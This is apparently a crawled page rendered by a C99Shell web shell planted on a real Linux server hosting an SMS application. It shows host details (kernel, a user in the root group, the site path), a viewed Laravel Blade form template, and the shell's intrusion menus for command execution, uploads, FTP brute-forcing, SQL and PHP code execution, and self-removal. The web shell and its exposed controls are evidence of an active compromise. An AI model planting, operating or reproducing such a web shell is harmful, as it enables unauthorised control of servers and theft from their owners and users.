!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html/resources/views/customer/dynamic_template/   drwxr-xr-x
Free 28.96 GB of 117.98 GB (24.55%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     form.blade.php (1.86 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<div class="form-group">
    <label for="">{{trans('customer.template_name')}}</label>
    <input type="text" class="form-control" name="name" value="{{isset($template)?$template->name:(old('name')?old('name'):'')}}">
</div>

<div class="form-group">
    <label for="">{{trans('customer.status')}}</label>
    <select name="status" class="form-control" >
        <option {{isset($template) && $template->status=='active'?'selected':''}} value="active">{{trans('customer.active')}}</option>
        <option {{isset($template) && $template->status=='inactive'?'selected':''}} value="inactive">{{trans('customer.inactive')}}</option>
    </select>
</div>

@if(isset($template))
    @php $counter=99999; @endphp
    @if(isset($fields) && $fields)
        @foreach($fields as $field)
            @php $counter++; @endphp
            <div class="row mt-2" id="field_row_{{$counter}}">
                <div class="col-md-11 col-11">
                    <label for="">Field</label>
                    <input type="text" name="inputes[]" value="{{$field}}" class="form-control"
                           placeholder="Enter Field Name">
                </div>
                <div class="col-md-1 col-1 pt-3">
                    <button class="btn btn-sm btn-danger mt-3 delete_field" data-id="{{$counter}}" type="button">
                        <i class="fa fa-trash"></i>
                    </button>
                </div>
            </div>
        @endforeach
    @endif
@endif
<div class="row">
    <div class="col-md-11 col-11">
        <label for="">Field</label>
        <input type="text" name="inputes[]" class="form-control" placeholder="Enter Field Name">
    </div>
    <div class="col-md-1 col-1 pt-4">
        <button id="add_more" class="btn btn-sm btn-success mt-2" type="button">
            <i class="fa fa-plus"></i>
        </button>
    </div>
</div>

<div id="append_fields">

</div>



:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.003 ]--